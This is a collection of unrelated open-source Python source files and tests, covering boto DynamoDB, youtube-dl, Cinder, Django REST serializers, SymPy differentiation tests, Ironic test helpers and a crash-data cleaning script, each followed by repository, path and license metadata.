provided as the LastEvaluatedKey in that query.
:type item_class: Class
:param item_class: Allows you to override the class used
to generate the items. This should be a subclass of
:class:`boto.dynamodb.item.Item`
:return: A TableGenerator (generator) object which will iterate
over all results
:rtype: :class:`boto.dynamodb.layer2.TableGenerator`
"""
return self.layer2.scan(self, *args, **kw)
def batch_get_item(self, keys, attributes_to_get=None):
"""
Return a set of attributes for a multiple items from a single table
using their primary keys. This abstraction removes the 100 Items per
batch limitations as well as the "UnprocessedKeys" logic.
:type keys: list
:param keys: A list of scalar or tuple values. Each element in the
list represents one Item to retrieve. If the schema for the
table has both a HashKey and a RangeKey, each element in the
list should be a tuple consisting of (hash_key, range_key). If
the schema for the table contains only a HashKey, each element
in the list should be a scalar value of the appropriate type
for the table schema. NOTE: The maximum number of items that
can be retrieved for a single operation is 100. Also, the
number of items retrieved is constrained by a 1 MB size limit.
:type attributes_to_get: list
:param attributes_to_get: A list of attribute names.
If supplied, only the specified attribute names will
be returned. Otherwise, all attributes will be returned.
:return: A TableBatchGenerator (generator) object which will
iterate over all results
:rtype: :class:`boto.dynamodb.table.TableBatchGenerator`
"""
return TableBatchGenerator(self, keys, attributes_to_get)
| apache-2.0 |
dannyperry571/theapprentice | script.module.youtube.dl/lib/youtube_dl/extractor/tlc.py | 12 | 1644 | # coding: utf-8
from __future__ import unicode_literals
import re
from .common import InfoExtractor
from .brightcove import BrightcoveLegacyIE
from ..compat import (
compat_parse_qs,
compat_urlparse,
)
class TlcDeIE(InfoExtractor):
IE_NAME = 'tlc.de'
_VALID_URL = r'https?://(?:www\.)?tlc\.de/(?:[^/]+/)*videos/(?P<title>[^/?#]+)?(?:.*#(?P<id>\d+))?'
_TEST = {
'url': 'http://www.tlc.de/sendungen/breaking-amish/videos/#3235167922001',
'info_dict': {
'id': '3235167922001',
'ext': 'mp4',
'title': 'Breaking Amish: Die Welt da draußen',
'description': (
'Vier Amische und eine Mennonitin wagen in New York'
' den Sprung in ein komplett anderes Leben. Begleitet sie auf'
' ihrem spannenden Weg.'),
'timestamp': 1396598084,
'upload_date': '20140404',
'uploader_id': '1659832546',
},
}
BRIGHTCOVE_URL_TEMPLATE = 'http://players.brightcove.net/1659832546/default_default/index.html?videoId=%s'
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
brightcove_id = mobj.group('id')
if not brightcove_id:
title = mobj.group('title')
webpage = self._download_webpage(url, title)
brightcove_legacy_url = BrightcoveLegacyIE._extract_brightcove_url(webpage)
brightcove_id = compat_parse_qs(compat_urlparse.urlparse(brightcove_legacy_url).query)['@videoPlayer'][0]
return self.url_result(self.BRIGHTCOVE_URL_TEMPLATE % brightcove_id, 'BrightcoveNew', brightcove_id)
| gpl-2.0 |
eharney/cinder | cinder/backup/__init__.py | 6 | 1026 | # Copyright (C) 2012 Hewlett-Packard Development Company, L.P.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# Importing full names to not pollute the namespace and cause possible
# collisions with use of 'from cinder.backup import <foo>' elsewhere.
from oslo_utils import importutils
from cinder.common import config
CONF = config.CONF
def API(*args, **kwargs):
class_name = CONF.backup_api_class
return importutils.import_object(class_name, *args, **kwargs)
| apache-2.0 |
podsvirov/grpc | src/python/grpcio/grpc/framework/interfaces/face/__init__.py | 1496 | 1530 | # Copyright 2015, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
| bsd-3-clause |
philipp-sumo/kitsune | kitsune/messages/tests/test_notifications.py | 17 | 2514 | from django.contrib.sites.models import Site
from django.core import mail
import mock
from kitsune.kbforums.tests import KBForumTestCase
from kitsune.sumo.tests import post, attrs_eq, starts_with
from kitsune.users.models import Setting
from kitsune.users.tests import user
PRIVATE_MESSAGE_EMAIL = '{sender} sent you the following'
class NotificationsTests(KBForumTestCase):
"""Test that notifications get sent."""
def setUp(self):
super(NotificationsTests, self).setUp()
self.sender = user(username=u'Alice', save=True)
self.to = user(username=u'Bob', save=True)
@mock.patch.object(Site.objects, 'get_current')
def test_private_message_sends_email(self, get_current):
"""
With the setting enabled and receiving a private message should
send and email.
"""
get_current.return_value.domain = 'testserver'
s, c = Setting.objects.get_or_create(user=self.to,
name='email_private_messages')
s.value = True
s.save()
# User has setting, and should recieve notification email.
assert Setting.get_for_user(self.to, 'email_private_messages')
self.client.login(username=self.sender.username, password='testpass')
post(self.client, 'messages.new',
{'to': self.to, 'message': 'a message'})
subject = u'[SUMO] You have a new private message from [{sender}]'
attrs_eq(mail.outbox[0], to=[self.to.email],
subject=subject.format(sender=self.sender.username))
starts_with(mail.outbox[0].body,
PRIVATE_MESSAGE_EMAIL.format(sender=self.sender.username))
@mock.patch.object(Site.objects, 'get_current')
def test_private_message_not_sends_email(self, get_current):
"""
With the setting not enabled and receiving a private message.
The user should not get an email.
"""
get_current.return_value.domain = 'testserver'
s, c = Setting.objects.get_or_create(user=self.to,
name='email_private_messages')
# Now user should not recieve email.
s.value = False
s.save()
assert not Setting.get_for_user(self.to, 'email_private_messages')
self.client.login(username=self.sender.username, password='testpass')
post(self.client, 'messages.new',
{'to': self.to, 'message': 'a message'})
assert not mail.outbox
| bsd-3-clause |
pierg75/pier-sosreport | sos/plugins/lightdm.py | 2 | 1737 | # Copyright (C) 2015 Red Hat, Inc., Bryn M. Reeves <bmr@redhat.com>
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
from sos.plugins import Plugin, RedHatPlugin, DebianPlugin, UbuntuPlugin
class LightDm(Plugin, RedHatPlugin, DebianPlugin, UbuntuPlugin):
"""Light Display Manager
"""
packages = ('lightdm', )
profiles = ('desktop', )
plugin_name = 'lightdm'
def setup(self):
self.add_cmd_output("systemctl status lightdm.service")
self.add_journal(units="lightdm")
self.add_copy_spec([
"/etc/lightdm/lightdm.conf",
"/etc/lightdm/users.conf"
])
if not self.get_option("all_logs"):
limit = self.get_option("log_size")
self.add_copy_spec("/var/log/lightdm/lightdm.log", sizelimit=limit)
self.add_copy_spec("/var/log/lightdm/x-0-greeter.log",
sizelimit=limit)
self.add_copy_spec("/var/log/lightdm/x-0.log", sizelimit=limit)
else:
self.add_copy_spec("/var/log/lightdm")
# vim: set et ts=4 sw=4 :
| gpl-2.0 |
Frikanalen/frikanalen | packages/fkweb/api/serializers.py | 1 | 12070 | # Copyright (c) 2012-2013 Benjamin Bruheim <grolgh@gmail.com>
# This file is covered by the LGPLv3 or later, read COPYING for details.
from django.conf import settings
from django.contrib.auth import get_user_model
from rest_framework import serializers
from rest_framework.authtoken.models import Token
import logging
import pytz
from fk.models import AsRun
from fk.models import Category
from fk.models import Organization
from fk.models import Scheduleitem
from fk.models import Video
from fk.models import User
from fk.models import VideoFile
logger = logging.getLogger(__name__)
class OrganizationSerializer(serializers.ModelSerializer):
editor_name = serializers.SerializerMethodField()
editor_email = serializers.SerializerMethodField()
editor_msisdn = serializers.SerializerMethodField()
fkmember = serializers.BooleanField(read_only=True)
def get_editor_email(self, obj):
if obj.editor:
return obj.editor.email
return None
def get_editor_msisdn(self, obj):
if obj.editor:
try:
return obj.editor.phone_number.as_international
except:
return ''
return None
def get_editor_name(self, obj):
if obj.editor:
return obj.editor.first_name + " " + obj.editor.last_name
logger.warning('Organization %d has no editor assigned' % (obj.id))
return 'Ingen redaktør!'
class Meta:
model = Organization
fields = (
'id',
'name',
'homepage',
'description',
'postal_address',
'street_address',
'editor_id',
'editor_name',
'editor_email',
'editor_msisdn',
'fkmember',
)
class VideoFileSerializer(serializers.ModelSerializer):
class Meta:
model = VideoFile
fields = (
"id",
"video",
"format",
"filename",
"created_time",
"integrated_lufs",
"truepeak_lufs",
)
class VideoSerializer(serializers.ModelSerializer):
organization = OrganizationSerializer(read_only=True)
creator = serializers.SlugRelatedField(
slug_field='email', queryset=get_user_model().objects.all(),
default=serializers.CurrentUserDefault())
categories = serializers.SlugRelatedField(
slug_field='name', many=True, queryset=Category.objects.all())
files = serializers.SerializerMethodField()
def get_files(self, video):
file_list = {}
for vf in VideoFile.objects.filter(video=video):
file_list[vf.format.fsname] = settings.FK_MEDIA_URLPREFIX+vf.location(relative=True)
return file_list
class Meta:
model = Video
fields = (
"id",
"name",
"header",
"description",
"files",
"creator",
"files",
"organization",
"duration",
"categories",
"framerate",
"proper_import",
"has_tono_records",
"publish_on_web",
"is_filler",
"ref_url",
"created_time",
"updated_time",
"uploaded_time",
"ogv_url",
"large_thumbnail_url",
)
read_only_fields = (
"framerate", "created_time", "updated_time", "files")
def validate(self, data):
is_creation = not self.instance
if is_creation and not data.get('organization'):
potential_orgs = data['creator'].organization_set.all()
if len(potential_orgs) == 0:
raise serializers.ValidationError(
{'organization': "Field required when "
"editor has no organization."})
elif len(potential_orgs) > 1:
raise serializers.ValidationError(
[{'organization': "Field required when "
"editor has more than one organization."}])
data['organization'] = potential_orgs[0]
return data
class VideoCreateSerializer(VideoSerializer):
organization = serializers.SlugRelatedField(
slug_field='id', queryset=Organization.objects.all(),
required=False)
class VideoUploadTokenSerializer(serializers.ModelSerializer):
upload_url = serializers.SerializerMethodField()
def get_upload_url(self, video_upload_token):
return settings.FK_UPLOAD_URL
class Meta:
model = Video
fields = (
'upload_token',
'upload_url',
)
class ScheduleitemVideoSerializer(serializers.ModelSerializer):
organization = OrganizationSerializer(read_only=True)
creator = serializers.SlugRelatedField(
slug_field='email', queryset=get_user_model().objects.all(),
default=serializers.CurrentUserDefault())
categories = serializers.SlugRelatedField(
slug_field='name', many=True, queryset=Category.objects.all())
class Meta:
model = Video
fields = (
"id",
"name",
"header",
"description",
"creator",
"organization",
"duration",
"categories",
)
read_only_fields = (
"framerate", "created_time", "updated_time")
class ScheduleitemModifySerializer(serializers.ModelSerializer):
starttime = serializers.DateTimeField(default_timezone=pytz.timezone('Europe/Oslo'))
endtime = serializers.DateTimeField(default_timezone=pytz.timezone('Europe/Oslo'), read_only=True)
class Meta:
model = Scheduleitem
fields = (
"id",
"video",
"schedulereason",
"starttime",
"endtime",
"duration"
)
def validate(self, data):
if 'starttime' in data or 'duration' in data:
def g(v):
return self.instance and getattr(self.instance, v)
start = data.get('starttime', g('starttime'))
end = start + data.get('duration', g('duration'))
sur_start, sur_end = (
Scheduleitem.objects.expand_to_surrounding(start, end))
items = (Scheduleitem.objects.exclude(pk=g('id'))
.filter(starttime__gte=sur_start, starttime__lte=sur_end)
.order_by('starttime'))
for entry in items:
if entry.starttime <= start < entry.endtime():
raise serializers.ValidationError(
{'duration': "Conflict with '%s'." % entry})
if entry.starttime < end < entry.endtime():
raise serializers.ValidationError(
{'duration': "Conflict with '%s'." % entry})
return data
class ScheduleitemReadSerializer(serializers.ModelSerializer):
video = ScheduleitemVideoSerializer()
starttime = serializers.DateTimeField(default_timezone=pytz.timezone('Europe/Oslo'))
endtime = serializers.DateTimeField(default_timezone=pytz.timezone('Europe/Oslo'), read_only=True)
class Meta:
model = Scheduleitem
fields = (
"id",
"video",
"schedulereason",
"starttime",
"endtime",
"duration"
)
def validate(self, data):
if 'starttime' in data or 'duration' in data:
def g(v):
return self.instance and getattr(self.instance, v)
start = data.get('starttime', g('starttime'))
end = start + data.get('duration', g('duration'))
sur_start, sur_end = (
Scheduleitem.objects.expand_to_surrounding(start, end))
items = (Scheduleitem.objects.exclude(pk=g('id'))
.filter(starttime__gte=sur_start, starttime__lte=sur_end)
.order_by('starttime'))
for entry in items:
if entry.starttime <= start < entry.endtime():
raise serializers.ValidationError(
{'duration': "Conflict with '%s'." % entry})
if entry.starttime < end < entry.endtime():
raise serializers.ValidationError(
{'duration': "Conflict with '%s'." % entry})
return data
class AsRunSerializer(serializers.ModelSerializer):
class Meta:
model = AsRun
fields = (
'id',
'video',
'program_name',
'playout',
'played_at',
'in_ms',
'out_ms',
)
class TokenSerializer(serializers.ModelSerializer):
class Meta:
model = Token
fields = (
'created',
'key',
'user',
)
class NewUserSerializer(serializers.ModelSerializer):
password = serializers.CharField(write_only=True)
# These two need to be explitly included because
# they are not required in the database model
# but we want new users to have these values set
first_name = serializers.CharField()
last_name = serializers.CharField()
date_of_birth = serializers.DateField()
def create(self, validated_data):
user = get_user_model().objects.create(
email = validated_data['email'],
first_name = validated_data['first_name'],
last_name = validated_data['last_name'],
date_of_birth = validated_data['date_of_birth']
)
user.set_password(validated_data['password'])
user.save()
return user
class Meta:
model = User
fields = (
'id',
'email',
'first_name',
'last_name',
'date_of_birth',
'password'
)
write_only_fields = (
'password',
)
class UserSerializer(serializers.ModelSerializer):
password = serializers.CharField(write_only=True, required=False)
organization_roles = serializers.SerializerMethodField()
def get_organization_roles(self, obj):
editor_list = list(obj.editor.all())
# A user may be both member and editor. As editor status supersedes
# member status, if they are editor, we filter out the membership
membership_list = list(filter(lambda x: x not in editor_list,
obj.organization_set.all()))
return list(
[
{
'role': 'editor',
'organization_id': o.id,
'organization_name': o.name
}
for o in editor_list
] + [
{
'role': 'member',
'organization_id': o.id,
'organization_name': o.name
}
for o in membership_list
]
)
class Meta:
model = User
fields = (
'id',
'email',
'first_name',
'last_name',
'date_joined',
'is_staff',
'date_of_birth',
'phone_number',
'organization_roles',
'password'
)
read_only_fields = (
'id',
'email',
'is_staff',
'date_joined',
)
class CategorySerializer(serializers.ModelSerializer):
videocount = serializers.SerializerMethodField('count_videos')
def count_videos(self, category):
return (Video.objects
.public()
.filter(categories=category)
.count())
class Meta:
model = Category
fields = (
'id',
'name',
'desc',
'videocount',
)
| lgpl-3.0 |
NYU-CS6313-Projects/Charts-for-CompStat | data/crash_cleaner.py | 1 | 3650 | #!/user/bin/python
# this python script cleans raw crash data and subsets the last n days of observations
# if n=-1 all rows of the raw dataset are kept
# WEEK and YEAR attributes are derived
import pandas as pd
import numpy as np
import datetime as dt
import re
import os
import logging
dpath = './'
def date_parser(ds):
if type(ds) == str:
return dt.datetime.date(dt.datetime.strptime(ds, "%m/%d/%Y"))
else:
return np.nan
def time_parser(ts):
if type(ts) == str:
return dt.datetime.time(dt.datetime.strptime(ts, "%H:%M"))
else:
return np.nan
#zip-s war by brigitte.jellinek@nyu.edu
def zip_cleaner(s):
if type(s) != str:
return np.nan
elif re.match('^\d\d\d\d\d$', s):
return s
elif re.match('^\d\d\d\d\d-\d*$', s):
return re.sub('-\d*$', '', s)
else:
return np.nan
def test_zip_cleaner():
assert '12345' == zip_cleaner('12345')
assert '12345' == zip_cleaner('12345-1234')
assert np.isnan( zip_cleaner(np.nan) )
assert np.isnan( zip_cleaner('1234') )
assert np.isnan( zip_cleaner('0') )
assert np.isnan( zip_cleaner('UNKNOWN'))
# reads the raw crash data
def read_crash_csv(data):
df = pd.read_csv(data,
dtype={
'DATE' : str,
'TIME' : str,
'BOROUGH': str,
'ZIP CODE': str,
'LATITUDE': np.floating,
'LONGITUDE': np.floating,
'LOCATION' : str, # derived type
'ON STREET NAME' : str,
'CROSS STREET NAME': str,
'OFF STREET NAME' : str,
'NUMBER OF PERSONS INJURED' : np.integer,
'NUMBER OF PERSONS KILLED' : np.integer,
'NUMBER OF PEDESTRIANS INJURED' : np.integer,
'NUMBER OF PEDESTRIANS KILLED' : np.integer,
'NUMBER OF CYCLIST INJURED' : np.integer,
'NUMBER OF CYCLIST KILLED' : np.integer,
'NUMBER OF MOTORIST INJURED' : np.integer,
'NUMBER OF MOTORIST KILLED' : np.integer,
'CONTRIBUTING FACTOR VEHICLE 1' : str,
'CONTRIBUTING FACTOR VEHICLE 2' : str,
'CONTRIBUTING FACTOR VEHICLE 3' : str,
'CONTRIBUTING FACTOR VEHICLE 4' : str,
'CONTRIBUTING FACTOR VEHICLE 5' : str,
'UNIQUE KEY' : np.integer,
'VEHICLE TYPE CODE 1' : str,
'VEHICLE TYPE CODE 2' : str,
'VEHICLE TYPE CODE 3' : str,
'VEHICLE TYPE CODE 4' : str,
'VEHICLE TYPE CODE 5' : str})
df['DATE'] = map(date_parser, df['DATE'])
df['TIME'] = map(time_parser, df['TIME'])
df['LOCATION'] = zip(df.LATITUDE,df.LONGITUDE)
df['ZIP CODE'] = map(zip_cleaner,df['ZIP CODE'])
df['WEEK'] = df['DATE'].apply(lambda x: pd.to_datetime(x).week)
df['YEAR'] = df['DATE'].apply(lambda x: pd.to_datetime(x).year)
df.columns = [field.replace(" ","_") for field in df.columns]
return(df)
# subsets the last n days of the crash data and logs a number of records in the dataset
# no subseting if n=-1
def sample_crash_data(n,path,folder):
df = read_crash_csv(os.path.join(path,'crashdata.csv'))
logging.basicConfig(filename=os.path.join(path,'sample.log'),level=logging.DEBUG)
df_new = df
if n!=-1:
start = dt.date.today()
logging.info('As for %s raw data set contains %s records ...' % (dt.datetime.strftime(start,"%m/%d/%Y %H:%M:%S")
,df.shape[0]))
end = dt.date.today()-dt.timedelta(days=n)
df_new = df[(df.DATE >= end) & (df.DATE <= start)]
df_new.to_csv(os.path.join(path,'%sdays_crashdata.csv' %(n)), index=False)
logging.info('Raw data set for the last %s days contains %s records' % (n, df_new.shape[0]))
else:
df_new.to_csv(os.path.join(path,'%srows_crashdata.csv' %(df_new.shape[0])), index=False)
# n = 150; n =-1
if __name__ == "__main__":
sample_crash_data(150,dpath,'data')
sample_crash_data(-1,dpath,'data')
| mit |
skidzo/sympy | sympy/core/tests/test_diff.py | 115 | 2793 | from sympy import Symbol, Rational, cos, sin, tan, cot, exp, log, Function, \
Derivative, Expr, symbols, pi, I, S
from sympy.utilities.pytest import raises
def test_diff():
x, y = symbols('x, y')
assert Rational(1, 3).diff(x) is S.Zero
assert I.diff(x) is S.Zero
assert pi.diff(x) is S.Zero
assert x.diff(x, 0) == x
assert (x**2).diff(x, 2, x) == 0
assert (x**2).diff(x, y, 0) == 2*x
assert (x**2).diff(x, y) == 0
raises(ValueError, lambda: x.diff(1, x))
a = Symbol("a")
b = Symbol("b")
c = Symbol("c")
p = Rational(5)
e = a*b + b**p
assert e.diff(a) == b
assert e.diff(b) == a + 5*b**4
assert e.diff(b).diff(a) == Rational(1)
e = a*(b + c)
assert e.diff(a) == b + c
assert e.diff(b) == a
assert e.diff(b).diff(a) == Rational(1)
e = c**p
assert e.diff(c, 6) == Rational(0)
assert e.diff(c, 5) == Rational(120)
e = c**Rational(2)
assert e.diff(c) == 2*c
e = a*b*c
assert e.diff(c) == a*b
def test_diff2():
n3 = Rational(3)
n2 = Rational(2)
n6 = Rational(6)
x, c = map(Symbol, 'xc')
e = n3*(-n2 + x**n2)*cos(x) + x*(-n6 + x**n2)*sin(x)
assert e == 3*(-2 + x**2)*cos(x) + x*(-6 + x**2)*sin(x)
assert e.diff(x).expand() == x**3*cos(x)
e = (x + 1)**3
assert e.diff(x) == 3*(x + 1)**2
e = x*(x + 1)**3
assert e.diff(x) == (x + 1)**3 + 3*x*(x + 1)**2
e = 2*exp(x*x)*x
assert e.diff(x) == 2*exp(x**2) + 4*x**2*exp(x**2)
def test_diff3():
a, b, c = map(Symbol, 'abc')
p = Rational(5)
e = a*b + sin(b**p)
assert e == a*b + sin(b**5)
assert e.diff(a) == b
assert e.diff(b) == a + 5*b**4*cos(b**5)
e = tan(c)
assert e == tan(c)
assert e.diff(c) in [cos(c)**(-2), 1 + sin(c)**2/cos(c)**2, 1 + tan(c)**2]
e = c*log(c) - c
assert e == -c + c*log(c)
assert e.diff(c) == log(c)
e = log(sin(c))
assert e == log(sin(c))
assert e.diff(c) in [sin(c)**(-1)*cos(c), cot(c)]
e = (Rational(2)**a/log(Rational(2)))
assert e == 2**a*log(Rational(2))**(-1)
assert e.diff(a) == 2**a
def test_diff_no_eval_derivative():
class My(Expr):
def __new__(cls, x):
return Expr.__new__(cls, x)
x, y = symbols('x y')
# My doesn't have its own _eval_derivative method
assert My(x).diff(x).func is Derivative
# it doesn't have y so it shouldn't need a method for this case
assert My(x).diff(y) == 0
def test_speed():
# this should return in 0.0s. If it takes forever, it's wrong.
x = Symbol("x")
assert x.diff(x, 10**8) == 0
def test_deriv_noncommutative():
A = Symbol("A", commutative=False)
f = Function("f")
x = Symbol("x")
assert A*f(x)*A == f(x)*A**2
assert A*f(x).diff(x)*A == f(x).diff(x) * A**2
| bsd-3-clause |
tannishk/airmozilla | airmozilla/manage/tests/views/test_permissions.py | 6 | 3637 | from nose.tools import eq_
import mock
from django.conf import settings
from django.contrib.auth.models import User, Group, Permission
from funfactory.urlresolvers import reverse
from airmozilla.main.models import UserProfile, Event, CuratedGroup
from airmozilla.base.tests.test_mozillians import Response, IN_GROUPS
from .base import ManageTestCase
class TestPermissions(ManageTestCase):
def test_unauthorized(self):
""" Client with no log in - should be rejected. """
self.client.logout()
response = self.client.get(reverse('manage:dashboard'))
self.assertRedirects(response, settings.LOGIN_URL
+ '?next=' + reverse('manage:dashboard'))
def test_not_staff(self):
""" User is not staff - should be rejected. """
self.user.is_staff = False
self.user.save()
response = self.client.get(reverse('manage:dashboard'))
self.assertRedirects(response, settings.LOGIN_URL
+ '?next=' + reverse('manage:dashboard'))
def test_staff_home(self):
""" User is staff - should get an OK homepage. """
response = self.client.get(reverse('manage:dashboard'))
eq_(response.status_code, 200)
@mock.patch('requests.get')
def test_editing_events_with_curated_groups(self, rget):
def mocked_get(url, **options):
if 'peterbe' in url:
print
return Response(IN_GROUPS)
raise NotImplementedError(url)
rget.side_effect = mocked_get
self.client.logout()
assert self.client.get(reverse('manage:dashboard')).status_code == 302
# now log in as a contributor
contributor = User.objects.create_user(
'peter', 'peterbe@gmail.com', 'secret'
)
producers = Group.objects.create(name='Producer')
change_event_permission = Permission.objects.get(
codename='change_event'
)
change_event_others_permission = Permission.objects.get(
codename='change_event_others'
)
producers.permissions.add(change_event_permission)
producers.permissions.add(change_event_others_permission)
contributor.groups.add(producers)
contributor.is_staff = True
contributor.save()
UserProfile.objects.create(
user=contributor,
contributor=True
)
assert self.client.login(username='peter', password='secret')
event = Event.objects.get(title='Test event')
assert event.privacy == Event.PRIVACY_PUBLIC
url = reverse('manage:event_edit', args=(event.id,))
response = self.client.get(url)
eq_(response.status_code, 200)
# the contributor producer can't view it if it's private
event.privacy = Event.PRIVACY_COMPANY
event.save()
response = self.client.get(url)
eq_(response.status_code, 302)
# but it's ok if it's for contributors
event.privacy = Event.PRIVACY_CONTRIBUTORS
event.save()
response = self.client.get(url)
eq_(response.status_code, 200)
# but not if the event is only open to certain curated groups
curated_group = CuratedGroup.objects.create(
event=event,
name='badasses'
)
response = self.client.get(url)
eq_(response.status_code, 302)
curated_group.delete()
CuratedGroup.objects.create(
event=event,
name='swedes'
)
response = self.client.get(url)
eq_(response.status_code, 200)
| bsd-3-clause |
bitcity/django | tests/gis_tests/maps/tests.py | 322 | 2099 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from unittest import skipUnless
from django.contrib.gis.geos import HAS_GEOS
from django.test import SimpleTestCase
from django.test.utils import modify_settings, override_settings
from django.utils.encoding import force_text
GOOGLE_MAPS_API_KEY = 'XXXX'
@skipUnless(HAS_GEOS, 'Geos is required.')
@modify_settings(
INSTALLED_APPS={'append': 'django.contrib.gis'},
)
class GoogleMapsTest(SimpleTestCase):
@override_settings(GOOGLE_MAPS_API_KEY=GOOGLE_MAPS_API_KEY)
def test_google_map_scripts(self):
"""
Testing GoogleMap.scripts() output. See #20773.
"""
from django.contrib.gis.maps.google.gmap import GoogleMap
google_map = GoogleMap()
scripts = google_map.scripts
self.assertIn(GOOGLE_MAPS_API_KEY, scripts)
self.assertIn("new GMap2", scripts)
@override_settings(GOOGLE_MAPS_API_KEY=GOOGLE_MAPS_API_KEY)
def test_unicode_in_google_maps(self):
"""
Test that GoogleMap doesn't crash with non-ASCII content.
"""
from django.contrib.gis.geos import Point
from django.contrib.gis.maps.google.gmap import GoogleMap, GMarker
center = Point(6.146805, 46.227574)
marker = GMarker(center,
title='En français !')
google_map = GoogleMap(center=center, zoom=18, markers=[marker])
self.assertIn("En français", google_map.scripts)
def test_gevent_html_safe(self):
from django.contrib.gis.maps.google.overlays import GEvent
event = GEvent('click', 'function() {location.href = "http://www.google.com"}')
self.assertTrue(hasattr(GEvent, '__html__'))
self.assertEqual(force_text(event), event.__html__())
def test_goverlay_html_safe(self):
from django.contrib.gis.maps.google.overlays import GOverlayBase
overlay = GOverlayBase()
overlay.js_params = '"foo", "bar"'
self.assertTrue(hasattr(GOverlayBase, '__html__'))
self.assertEqual(force_text(overlay), overlay.__html__())
| bsd-3-clause |
tangfeixiong/nova | nova/tests/unit/virt/ironic/utils.py | 42 | 4038 | # Copyright 2014 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova import objects
from nova.virt.ironic import ironic_states
def get_test_validation(**kw):
return type('interfaces', (object,),
{'power': kw.get('power', True),
'deploy': kw.get('deploy', True),
'console': kw.get('console', True),
'rescue': kw.get('rescue', True)})()
def get_test_node(**kw):
return type('node', (object,),
{'uuid': kw.get('uuid', 'eeeeeeee-dddd-cccc-bbbb-aaaaaaaaaaaa'),
'chassis_uuid': kw.get('chassis_uuid'),
'power_state': kw.get('power_state',
ironic_states.NOSTATE),
'target_power_state': kw.get('target_power_state',
ironic_states.NOSTATE),
'provision_state': kw.get('provision_state',
ironic_states.NOSTATE),
'target_provision_state': kw.get('target_provision_state',
ironic_states.NOSTATE),
'last_error': kw.get('last_error'),
'instance_uuid': kw.get('instance_uuid'),
'driver': kw.get('driver', 'fake'),
'driver_info': kw.get('driver_info', {}),
'properties': kw.get('properties', {}),
'reservation': kw.get('reservation'),
'maintenance': kw.get('maintenance', False),
'extra': kw.get('extra', {}),
'updated_at': kw.get('created_at'),
'created_at': kw.get('updated_at')})()
def get_test_port(**kw):
return type('port', (object,),
{'uuid': kw.get('uuid', 'gggggggg-uuuu-qqqq-ffff-llllllllllll'),
'node_uuid': kw.get('node_uuid', get_test_node().uuid),
'address': kw.get('address', 'FF:FF:FF:FF:FF:FF'),
'extra': kw.get('extra', {}),
'created_at': kw.get('created_at'),
'updated_at': kw.get('updated_at')})()
def get_test_flavor(**kw):
default_extra_specs = {'baremetal:deploy_kernel_id':
'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa',
'baremetal:deploy_ramdisk_id':
'bbbbbbbb-bbbb-bbbb-bbbb-bbbbbbbbbbbb'}
flavor = {'name': kw.get('name', 'fake.flavor'),
'extra_specs': kw.get('extra_specs', default_extra_specs),
'swap': kw.get('swap', 0),
'ephemeral_gb': kw.get('ephemeral_gb', 0)}
return objects.Flavor(**flavor)
def get_test_image_meta(**kw):
return {'id': kw.get('id', 'cccccccc-cccc-cccc-cccc-cccccccccccc')}
class FakePortClient(object):
def get(self, port_uuid):
pass
def update(self, port_uuid, patch):
pass
class FakeNodeClient(object):
def list(self, detail=False):
return []
def get(self, node_uuid):
pass
def get_by_instance_uuid(self, instance_uuid):
pass
def list_ports(self, node_uuid):
pass
def set_power_state(self, node_uuid, target):
pass
def set_provision_state(self, node_uuid, target):
pass
def update(self, node_uuid, patch):
pass
def validate(self, node_uuid):
pass
class FakeClient(object):
node = FakeNodeClient()
port = FakePortClient()
| apache-2.0 |
annapowellsmith/openpresc | openprescribing/frontend/tests/commands/test_generate_presentation_replacements.py | 1 | 4653 | from django.core.management import call_command
from django.test import TestCase
from frontend.models import Chemical
from frontend.models import Presentation
from frontend.models import Product
from frontend.models import Section
